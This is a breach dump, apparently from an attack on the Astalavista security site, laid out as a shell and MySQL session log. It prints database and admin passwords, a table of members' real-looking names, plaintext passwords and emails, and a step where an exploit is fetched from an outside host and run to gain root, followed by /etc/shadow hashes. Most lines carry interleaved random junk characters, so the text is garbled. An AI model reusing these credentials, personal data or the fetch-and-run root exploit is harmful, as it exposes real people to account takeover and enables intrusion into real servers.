drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0074 P" \6 r" _& Z
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql) a# K- t( r+ b
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com" a1 e7 u( q) y
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
/ N3 S0 X6 [) e6 X# H2 h3 K5 Qdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner2 e3 h; @8 Y0 C6 g* ~5 M
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg+ q \5 k, S8 ?5 T
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
7 P$ r1 u/ Y$ ^+ Q/ l& Y$ g2 sdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron J' `" ^$ }$ G% p" x' d
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
L8 X w1 \& S& x0 V' k: Q-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php) F2 z) t9 b" s; o n3 _. X
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico; c }0 i8 S% T7 c" g) |$ d& r
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
$ M6 n! c1 R* Fdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour5 }4 d" @+ l. X& _5 Q! h
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess( E$ L2 w/ F0 g! n7 Q
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess+ b$ h" p2 Y- @' I: @3 U+ z
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
( P' [$ ~6 s* \-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
( O" Q4 |. ]1 n-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
7 @) C/ D4 h2 }* I/ G-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php. [8 u" s' O& ^4 c5 y. W
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
9 z4 n! O- M; v3 idrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
2 w2 R4 `0 [, @$ |) xdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
! F U5 [6 n" D7 bdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
! }+ r, M7 A/ |( Z4 J3 edrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
' G8 L6 B. _1 i6 D. S2 ^( M; Mdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
( ~) |8 g2 b7 [/ E( m) r# g& z4 Mdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata+ d8 ~5 B7 U+ H5 y
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
4 [4 E* q4 L$ ~% y2 ]-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf* g/ z; j+ K% \, m
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re* O( e( d3 D/ @4 A& w) N! u! Y
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt' T8 D8 A! o' o: P. u
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss, k9 l2 Q( Z+ {9 m) m. j
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources4 @/ Y0 q4 m" C- J2 A. K# q, e' L
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
' U; e' }: X# B) Y) v2 e5 Qdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
* K- {# W) m: h& Ydrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src0 y# I5 O b1 {* {+ D9 k% Z
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
. l' L8 o( }) L! @' Wdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2% ?) _1 D( r2 w
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
2 b* o, w/ }2 t-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
: `2 ^) d" M* o) l5 |; {* D% G' tdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki) J+ G0 `0 N% e r9 T
/ p% Q. g4 \ D3 T( tsh-3.2$ head -20 index.php5 a5 o8 G1 R' S+ {/ {; d
<?PHP6 L! m9 y; x: p2 c9 k, O5 ?
/**
+ R& ~4 a6 D$ z$ y! u8 ? u6 d* Mainfile (external) for astalavistaNET v2.0
+ c. _& U1 Y7 B$ g/ h( I: _( h*. z s/ `3 J: ^/ e
* @copyright Astalavista IT Engineering GmbH; f% X* ?4 v$ T" V
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
5 z# {- A, G- u1 _; a* @version 1.0
( e" i4 z6 g+ m0 Z8 j: p*/
, M0 r) J% X8 u& j8 a) i. T
) Y0 R" e1 l Q+ }: c if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
+ a+ ?: _0 f% c# |8 C! ~ $dontStartSession = false;
' {, ?" ]% i; j2 k& Y& r C7 Q; } } else {9 [- ]% j' e, y
$dontStartSession = true; W! E& A- P8 R0 |
}/ \( F. f: k( c5 @) j, F
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);% I- |2 D$ b6 R# d/ D
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
; }8 c" f# P, f1 L+ N require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
4 R h; x7 w3 s- w5 v9 r# D4 i! v/ y require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
" {8 R: O$ L, Y8 U& c3 \
) [$ C: t! ?* e* }sh-3.2$ cd config
9 C. {' ~0 T$ j8 p) S3 W9 ksh-3.2$ ls -la: n( `) T1 P( N3 y
total 32
* F4 A. z+ a3 r+ J# _' W8 l, idrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
/ ]( Q* X7 M1 T5 ]! K Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
: j3 @/ G6 S7 p( ~( Z-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
1 `2 w) h- ]+ _: y6 r-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
+ r& p0 p; } G: S$ H-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
9 d1 G# O# F/ b& `: _-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php* ]) p* M8 t2 ^) s, ~3 M( C2 O& N" e
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
9 L& h8 w. M$ E& r1 g
7 [- K v9 A4 m) B4 ysh-3.2$ cat com.conf.php
: D0 _+ M& @# Z; K) R[snip]$ U# o' L. G& |# c# I% E
//member-database& d! `7 B: z6 j$ U+ K- D8 i/ U
$_CONFIG['db_mem_server'] = ‘localhost’;
( ]$ m n1 p$ a, J$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
0 W+ y1 F" t: f! ~+ H& B+ O' ~% d8 Q$_CONFIG['db_mem_user'] = ‘astanet_db’;1 o+ r- c* y, y/ S( F/ U' U
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;% A' ^+ z6 r: t* L
$_CONFIG['db_mem_debug'] = false; //true or false
0 j# V O2 J& a$ T, f% x//ads-database9 v, a8 f' v" L' L0 q0 _; N) E
$_CONFIG['db_ads_server'] = ‘localhost’;
# E1 u1 [- e$ W3 e8 f' q) K$_CONFIG['db_ads_database'] = ‘astanet_ads’;% @# L1 k% z% L5 |1 X3 b
$_CONFIG['db_ads_user'] = ‘astanet_db’;/ Q& k1 X1 {8 Q: I" o) j
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;7 P& X/ E M8 d8 s
$_CONFIG['db_ads_debug'] = false; //true or false7 {$ a, h( O2 R; @4 J5 L; y( Q2 g
//rainbow-database
6 Y/ Y; b/ x& S, N$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
/ e g' Q; Y) k) Y. Y# B$_CONFIG['db_rainbow_database'] = ‘rainbow’;. ~) ^9 ?9 N) C: b
$_CONFIG['db_rainbow_user'] = ‘dinu’;" ~1 T& m. q! c2 V$ e3 p0 A: r
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
2 x, J$ l L% L: J# ^2 R$_CONFIG['db_rainbow_debug'] = false; //true or false
0 X% u1 X, R# ^: ~5 y8 t9 L//mailing lists database6 Z5 N3 b; M4 a3 }' @& S1 {4 Y8 Z
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;/ k M, {+ x* V8 ~6 C; ?
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;+ R- i' |$ P' J, L0 g
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;" q7 K) S% m8 L1 |" a' m
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
- D# t0 R8 m3 U- ?$_CONFIG['db_mailing_lists_debug'] = false; //true or false( `9 ^' d, U- W4 R' x) I- n
//paypal
, q, @9 X8 E+ W `1 [! |$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;: F; Q" x8 D5 b1 I6 Y+ Q* _
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
# i3 z8 s9 f# z- P. q8 g6 F$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
" a4 G% T$ Y- G; B2 q$_CONFIG['sub_pp_noship'] = ‘1′;" C: e! P$ g w6 x# L7 c, O/ c% f4 n
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;" y' w9 t U* ]5 O! D( i1 o2 f+ B
[snip]4 @! H. C# e7 R4 O
, U& @3 O7 J. U( e
sh-3.2$ cd ..9 Z& O6 h* B$ z, z2 c& E. } s
sh-3.2$ cd member) J* F( K0 Q' I( T
sh-3.2$ ls -la' `- O& w+ @/ ?$ ^9 D
total 204 {, [! I/ J6 y9 ?2 O: O. @
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
/ T% v! I1 S: E4 E5 s. Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
6 q ?% X/ G* f7 D5 U0 W; W+ H$ `-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess& v& M# W, |) c* @/ e9 i5 Q& J
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php) J! S2 B* G4 w- O `* T+ C* S* E
sh-3.2$ cat .htaccess
. A+ A8 {/ u% n" kSecFilterEngine off
; ?3 P3 } \0 a$ Y+ D* X% K- {7 Z; @! J1 B3 B
sh-3.2$ cd ..
2 @: W* V2 S# h# Ush-3.2$ cd cron r1 i8 o9 W' g, O9 [4 h
sh-3.2$ ls -la/ \0 G3 `2 T1 a' s* P5 \7 B* r$ F
total 1683 p: U- u' A8 Z" l1 [4 ?
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .; p ] H# l4 i( r5 G; }
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
) S! r$ m6 i* Z-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
" U- x3 _& n2 v' g-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php& C: b- a' s& p
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
' O, ^0 O- e! e. e% H-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
0 k3 j2 S. W+ y) W* Q @! p8 S-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php, s, \, m. G. b
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php0 _* J- X2 I# b
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
; ~1 ~/ u/ m, Q) \" ?-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
5 \/ `" h1 c$ w8 ~6 E-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
( Z6 N( F& H$ D6 l7 a0 w9 ?8 C( J-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
9 L1 J, ]' S3 ^6 h( w-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
& H1 C4 t4 x; E-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
, r# ]& F( U$ w9 M' |/ I-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh; A9 B; M F1 E( \
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php/ }1 P' _/ \$ T% N1 W2 D6 y
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php* g5 W+ B. d" h1 q9 {7 Y8 O
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php2 R% E& |" `6 @# C: A% \
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php( o- W3 \, Q2 J2 _& @
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php! k+ O" F* n$ r" S! L! A
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
2 T1 S' Z$ {" r-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php5 y, w) B" X; W% Y5 Y2 `
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
& y( Z% Z" `4 y) U4 M3 j. I! H. B* Y) d7 V2 w. t
sh-3.2$ cd ..
# p1 M8 y- C( k' Q; R ^0 \sh-3.2$ cd _007
1 G! }. B+ K* bsh-3.2$ ls -la
' y* Q2 Y4 I+ [! |total 243 P$ O2 Z! S% b+ p! }8 Q6 B
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
' D- b& `5 m6 f3 b9 ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, E0 I$ l3 A* o% c# R6 q-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
8 s+ F1 ^; f$ R4 x! k# m$ m( w-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
+ ]! i- I8 a0 D2 U R6 F-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
U' e3 E$ ?- x+ C& ^- m) E% r \drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap1 F# ?5 K2 T L: X3 n) e- _
4 j* ~! [( Z9 r, x4 p' _
sh-3.2$ cat .htaccess
: _- M. D! D% d5 F8 L4 W4 L$ |authType Basic
. L! |4 R: U* L. ~+ s9 cauthName Admin
9 z; X- M) x1 _, U5 \4 p+ oauthUserFile /home/astanet/auth/.htadm_pwd7 R; D$ s% N2 k" I. n2 O3 ]
require valid-user; W Q5 ~; E: s, T4 g
3 z& l& _! O. c4 n$ m `, i$ q, Gsh-3.2$ cat /home/astanet/auth/.htadm_pwd* p5 W" E( ~- X( {% k
admin2net:CR0bl65MwhfT
4 m1 B8 R4 c' U' \: O7 x; l1 Q3 a
" A9 m6 Q) Q, X* y# J* t( wsh-3.2$ mysql -u astanet_db -p
; m1 v( U( v& O1 }) XEnter password:, o/ q7 W5 f' I |& Y9 ?4 ]2 {3 O% X
Welcome to the MySQL monitor. Commands end with ; or \g.
* Z8 P/ T1 d$ r/ B1 F! V1 n lYour MySQL connection id is 2751537 `: n/ _) _4 \/ R
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
3 T6 e! _ t& N1 I1 P1 G' K+ Y0 W& z, }9 D! u0 M: @
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
3 u. P) U5 ]* t8 g) U2 E! c/ F8 I! @
mysql> show databases;
2 X0 z( {: K8 O8 J# L+———————–+
9 w) d7 M6 S" c3 S* |/ j| Database |' i2 A: t, \) D O4 V7 A! b
+———————–+. L c3 m1 w4 B
| information_schema |
: P- o! ?5 @4 i9 J| astanet_ads |
7 I% H4 ]; o# @! U7 X, @' U E| astanet_mailing_lists |
5 R* o* S% H1 I' _. c& a| astanet_mediawiki |% k7 x O0 n; _! }' A
| astanet_membersystem |
- q6 H8 A! H a. F" E( {1 ^- c| test |
) X+ E$ X5 l1 d+———————–+5 I' q4 t+ l; ^! `2 t' S
6 rows in set (0.00 sec)" Y6 |3 \/ k' b+ d, A) t
- O7 X. b+ q7 i5 a% ^mysql> use astanet_membersystem# [) Q- d( u. B- j
Database changed
+ b. Q/ I7 n @% hmysql> show tables;0 z B5 S1 @! O
+———————————–+
1 Y& Z [/ `; g5 a8 t! W0 W# m$ W| Tables_in_astanet_membersystem |
8 b( _; w. T9 @" f) W, K: U+———————————–+# l4 L Z4 L1 D7 T" K5 p
| blacklist_categories |
- H; t* n$ n4 G7 P4 c4 v| blacklist_content |
: M" d6 u9 l8 Z2 m! T# F! D% z| blacklist_levels |
5 f1 @2 a) T% G: U8 h& ]( `; b6 M| blacklist_mcset |* p Y3 D3 V+ {0 O9 w L; d
| dir_categories |
9 z8 {$ N6 I# Z: K" h0 h' H4 I/ b| dir_comments |
/ R6 A3 f2 ^$ Z$ {6 ?% _: |# L, R| dir_links |! m- m/ p* B$ Z5 k3 d7 r: _
| dir_temp |
/ c+ c E8 s$ m; u| dir_votes |) b# \# S" j; ?0 r/ ?: I+ V% t% R# C
| documents |1 X* G0 K. K( M1 Q
| documents_categories |
/ E( p; c# ]. n2 f| email_content |
7 _3 }9 t, |; F( E) C' U| email_settings |+ S- ^( r8 K$ u
| exploits |# R9 e0 Z h O
| exploits_categories |4 r+ r2 t, [! e
| exploittree_categories |
% {& `3 I _+ I; T8 }( T| exploittree_exploits |
- i6 x( Q7 [! x+ a2 F ?( t8 m1 v| home_values |: n0 g4 ?& y, U& R; ?0 m9 m
| iso_countries |
8 O6 A5 J/ ~& |& Y& E| links_categories |* v8 N5 E: N8 b- L& v8 Q+ X
| links_records |
, g9 D7 j6 e3 n1 W: c( Z& f| links_unauth |
+ C3 l3 [& [% O| links_votes |1 ?( s. g' H. c$ s4 W
| log |! W! o8 u$ l2 c1 e: e- y' o
| news_categories |
/ `9 @% `% _" a5 ?7 j# Z| news_comments |
/ N; g% f5 X" b0 |/ h| news_emoticons |
4 r+ |; ?% z$ w4 W' v) D| news_latest |
% l* z8 Z7 {* ^' O: M0 j9 z) ^| news_messages |3 S5 F' J/ f7 K5 q
| news_statistics |9 j! k1 b; ]; m8 }5 z' t8 Z
| news_votes |
3 q2 D+ ?( E+ r8 ^0 | o8 H% h| prices_content |
7 E9 F7 H C I4 ]) G& B; I" g. W2 K| prices_offers |) M, U5 F0 J0 f7 f7 K
| rss_settings |
3 M. E- t* a1 V| sessions |1 k0 n- I+ ]8 }! e) `
| stats_signups |
, i6 e8 ~4 [$ i4 u) {; o! k| u2u2 |
$ f0 n% N& e# ^/ V8 V+ ^, }- D2 V| u2u_contact |0 C4 p! @' e, ?, ^: q
| u2u_settings |
: t7 u) a2 Q* T7 g! ]| user_keywords_selected_categories |
7 I1 `- ~1 V4 W$ \' H. L7 j| users |, ~6 c9 O( D2 c
| users_ipn_test |
9 k4 ~! I9 m q+ o| users_keyword_values |. L0 f6 s! s, Z% v5 H2 w
| users_profile | q' c7 c4 b& d4 b
| users_temp |
0 D G3 c6 J) m2 Q| users_upgrade |
( W; h, ] ^. f- g0 o+———————————–+; }7 ]% z1 [1 Z$ \4 P8 S3 [% O
46 rows in set (0.00 sec)
: z2 Q Z% O+ ^# H. G
/ N% L5 k! ?" `7 s3 ^9 bmysql> describe users;& y# F! u! x5 j8 S: C0 D
+————————–+————————————–+——+—–+———————+—————-+
0 E: x) F; j9 b) E# z! e| Field | Type | Null | Key | Default | Extra |, p" {/ x" S$ b: I3 A
+————————–+————————————–+——+—–+———————+—————-+* L P! ?2 b7 n# V e
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
9 s# T" m; `8 v( [| user | varchar(50) | NO | | | |* i. d$ G" @: ]4 Z( j, m- A6 ?
| nickname | varchar(30) | NO | MUL | anonymous | |
3 N; |3 W& i6 }& h O| password | varchar(30) | NO | | | |
' x# t6 B' X1 }3 V| userlevel | tinyint(3) | YES | MUL | NULL | |
: o% @. l4 k5 o" ?| exp | int(8) unsigned | NO | | 0 | |
- [2 F# ^, H! h. d: f/ s4 Z% o| email | varchar(50) | NO | | | |2 H# g& H5 A6 r: F7 N7 |/ r
| ip | varchar(15) | NO | | 0 | |. t6 C# V8 b, N" d( X6 T0 Q6 u
| proxy | set(’0′,’1′) | NO | | 0 | |/ R! Z5 ~. U. P3 o1 K2 o9 O2 t0 o
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |. H% F, [% Z7 I5 r/ j& E& d! v
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
. Y( B6 m2 N2 k. O| anz_in | tinyint(1) | NO | | -1 | |
+ l, z3 U) z% q+ T3 p| status | tinyint(1) unsigned | NO | | 0 | |
: p2 t/ b$ p- J2 q| checked | set(’0′,’1′,’2′) | NO | | 0 | |2 i d6 M* M; x' R' U
| freemember | set(’0′,’1′) | NO | | 0 | |$ J! U' H1 z0 b6 e# ~9 m& V' f% `
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
3 B" s3 Q/ g1 S7 W| lang | tinytext | NO | | | |
$ [% q( ?# c3 k# L0 D6 j$ I3 N| adid | smallint(6) | NO | | 0 | |5 F8 Z- m' f# Y. L% W/ b. l- \
| pp_txn_id | varchar(255) | YES | | NULL | |( P# L* I, E9 R2 U7 v/ B% s7 H5 w
| cnb_transaction_id | varchar(255) | YES | | NULL | |
4 E4 h: h" S0 {" l) u' C| cnb_order_id | varchar(255) | YES | | NULL | |% W- V( G% i2 X1 W
| cnb_user_id | int(11) | YES | | 0 | |+ \5 N/ a* P. a7 \2 Y; n3 K. `
+————————–+————————————–+——+—–+———————+—————-+2 f9 b7 q- f* g& N1 U' h! A$ \* k
22 rows in set (0.01 sec)8 I4 J% g {* {! Z4 i
$ k2 ~) q, n, L1 A' n, c$ _mysql> select count(*) as skids from users;
+ ~4 I# k" h: \9 K1 N, T+——-+
$ a5 x5 b" Y w/ W/ h' E" [| skids |1 B2 ~2 H+ g& b
+——-+
( p+ C- Y2 s' R6 F* C* d! e2 F" y| 25199 | q& s$ T: L, P( v0 t0 w7 y
+——-+
+ X# S/ C& n/ t M1 row in set (0.00 sec)
8 x! O, d/ m. [3 ^" n1 w% g' L ]: s9 L, X
mysql> select user,nickname,password,email from users where userlevel = 1;
: o& M5 o6 c6 y) z; D+————————–+———————-+——————+———————————–+3 L& Y$ D2 H# |
| user | nickname | password | email |2 D% t3 [* [6 @* E% y
+————————–+———————-+——————+———————————–+
# l; z. p B& \' B* S| pascal | prozac | astaman3 | 链接标记info@astalavista.net |) b# g S2 s1 J
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |% y2 f& ?# p+ f \ q V
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |. u1 f& F# }! m7 _
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
: j7 e$ z5 b; o0 k3 ^ I| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |2 u2 T' d- T) y
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
- K. y7 m4 I! D. F# R+ h| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |5 y H2 S: c! Z! u
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
3 S$ |/ t4 d! w5 k; S| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
1 H4 Z2 \; d& T! a9 z6 [| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |% a+ Q; t: x* R
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
$ x* d. \, q$ i| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |% u. K: z m3 H
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
6 H. Q7 Z* q" y, O0 n7 L9 y& R( d| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
6 L1 V: @/ i) p4 v- @6 l# R( u| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |; o$ E0 E+ a. H2 m# y
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch | g4 z6 |4 j, }5 E
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |# b; }0 l4 T% W) Q8 j: c, c
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |2 M4 J3 v; w6 k0 H$ H: \6 U4 E
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
8 u4 V4 @' @4 ?7 w+ c$ l" I| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
- p0 K: h/ B- X( v| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |, H+ {2 n% J4 \6 q9 ~% F0 f
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |% }; l l# [# I1 z% x) w- E) G7 |
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
+ S7 g F$ H: C# |, Q- ~* ]| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |2 c% I$ B' A3 q2 p# d8 N4 z3 l
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
! A# |7 I+ c! `$ M$ B+ ~! E3 I# z| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
/ C& U, r. a0 Z& ?( j! o+ S- @| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
! B( j( p b2 V' I+————————–+———————-+——————+———————————–+
4 f: x: P; o U* b" V27 rows in set (0.00 sec)
; r( u5 R; a/ ~ [/ g2 y. G9 R
2 G- d# r* i6 r) q) vmysql> exit;6 L' [+ H0 V, n: x( r
Bye
/ w+ Q& r2 o' X* r) p
/ M2 C( _$ m( R! Y! l& k[~] plaintext passwords? yes,( H! U O/ P" I) |0 Z( q6 d$ k
Those so called “security professionals” who charge you $6.66 / month to+ X4 `6 d5 @. _
register at their hack-proof portal, save your passwords in plaintext…; ?7 S# x" ?9 @& ~8 C
brilliant!4 y: W+ K% n) V9 K- b+ |
' ^1 r, x: S% v+ e" _2 v: E2 y
[~] This been fun but we want more.
7 x: o5 g# P# [# V8 g! M C: o' L" I! v6 C0 x, N1 i4 Y c0 o; q; x
sh-3.2$ uname -a! ~4 F3 Q0 i9 I+ I* a% }: r
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
' @; G* n4 V$ Z* U/ Ssh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
7 ] z" o9 m- L- a0 G9 j–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
2 f0 @" f( r) F1 n2 }+ Z: R+ oResolving anti.sec.labs… 13.33.33.374 s/ J: G5 w" b1 S& @) l
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
8 x5 p9 A! v/ E6 `8 S' f6 _/ FHTTP request sent, awaiting response… 200 OK
( a' P+ i1 O! q, eLength: 18200 (18K) [text/plain]1 X! N% ^- a6 H2 v' Z# W
Saving to: `g0troot’
6 D- H: q l5 A( [2 v+ u4 _; @
5 }! J; _* ?- y6 s( y100%[=========================================================================================================================================>] 18,200 58.6K/s in
5 b+ C |% D! x; B$ }0.3s1 l1 k3 |- R% a3 y O, j
0 m2 T7 S% j# A
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
% b/ q: [9 l$ r, j. N& t3 g2 j' u5 R- b e9 F4 ?& o6 L
sh-3.2$ ./g0troot -i x86_640 }. }' h$ b. V5 ?5 J3 I
[+] g0troot - anti.sec.labs0 x9 F% ]8 L) [, H
[+] Target: 2.6.18-128.1.10.el58 W) K; u3 l5 J5 ]& R
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
# v5 T" z) t e A* F) V
7 d. }/ o. T& T7 ?4 @ H; o) n* Q[+] r00tr00t
1 P1 |) {. }9 Q. K2 r[~] Executing shell…1 V6 }* o2 z( z! k! z ]# X+ f/ [
" p" w5 y0 [) @6 M! P- u. O. ~- _4 p
sh-3.2# id3 A7 D* V, P- ^: S- R- y/ n. ~: D
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)1 ?0 w! M8 w8 k* k
. o) [3 v9 c' `0 Y- ?2 S1 t
sh-3.2# cat /etc/shadow3 ]6 Q8 ?5 ?5 t/ s6 H
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
3 M$ \$ x+ d4 E7 d: `2 p( O$ A[snip]8 \7 Q+ h% h7 @+ O* H/ w) F- _1 o# v
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
" g" C% X W' E0 n3 ujon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
